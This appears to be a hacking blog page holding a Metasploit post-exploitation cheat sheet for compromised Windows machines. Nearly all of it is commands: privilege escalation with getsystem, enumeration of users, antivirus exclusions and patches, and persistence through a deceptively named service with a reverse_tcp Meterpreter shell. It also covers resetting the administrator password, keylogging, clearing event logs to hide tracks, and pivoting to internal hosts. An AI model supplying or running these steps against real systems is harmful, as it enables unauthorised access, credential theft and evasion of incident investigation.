rootđź’€bl4ck4non-sec:~#

Hack. Eat. Sleep. Repeat!!!

View on GitHub

Using the “getsystem” command to try and escalate privileges

getsystem

To get a list of mount or drives attached to the system

show_mount

To change the architecture of the meterpreter payload

search migrate
use post/windows/manage/archmigrate

To use the windows privileges module

use post/windows/gather/win_privs

To check what users are currently logged in and their SID’s

use post/windows/gather/enum_logged_on_users

To check if the target machine is a virtual machine

use post/windows/gather/checkvm

Checking the installed programs on the target system

use post/windows/gather/enum_applications

To check antivirus installed on the target’s machine and to check the folders not being scanned by the antivirus program

use post/windows/gather/enum_av_excluded

To enumerate the computers part of the domain

use post/windows/gather/enum_computers

To check for installed patches which can help with privilege escalation

use post/windows/gather/enum_patches

To enumerate for shares

use post/windows/gather/enum_shares

To enable rdp on the target’s device

use post/windows/manage/enable_rdp

Establishing Persistence on windows

Establishing persistence

search platform:windows persistence

Choosing one

use exploit/windows/local/persistence_service
set payload windows/meterpreter/reverse_tcp
set service_name (this should be something deceitful)
set SESSION

After killing all the sessions, to enable persistence

use multi/handler

Set payload that was set for the persistence

set payload windows/meterpreter/reverse_tcp

Set LPORT to what you set it as when you were doing the persistence

set LHOST
set LPORT

Enabling RDP

To enable rdp, background the session

use post/windows/manage/enable_rdp
set session

Enabling rdp requires username and password, since we have a meterpreter shell as Administrator we can go ahead and change the user’s credentials or should i say the administator’s password To change the administrator’s password

net user administrator hacker_123321

Windows Keylogging

This is using the “keystroke” command, after getting a meterpreter session

To start

keyscan_start

To dump the captured key strokes

keyscan_dump

To stop the sniffer

keyscan_stop

Clearing windows event logs

To clear

clearev

Pivoting

Here, you have 2 ips, victim_1 and victim_2. victim_1 can be scanned using metasploit but victim_2 can’t which means it can only be accessed internally.

Getting a meterpreter shell on the victim_1 IP

To access the second IP, we can add a route, since we know that victim 2 Ip is part of the same subnet victim 1 is in On your metepreter shell, the ip to route will be the victim 1 ip

run autoroute -s 10.10.10.0/20

This will add a route to the network You can rename the previous meterpreter session

sessions -n victim-1 -i 1

Just because we added a route doesn’t mean we can use external tools like nmap. We can make use of the nmap module in metasploit

use auxiliary/scanner/portscan/tcp
set RHOSTS victim_2

Portforwarding from victim_2 to victim_1 Going over to the opened meterpreter session

portfwd add -l 1234 -p 80 -r $victim2_ip

-l--> port you want to forward to
-p--> port you want to forward
-r--> ip address of the port you want to forward

So, you can access port 80 of victim 2 on port 1234 of your local host

To get a meterpreter shell

set payload windows/meterpreter/bind_tcp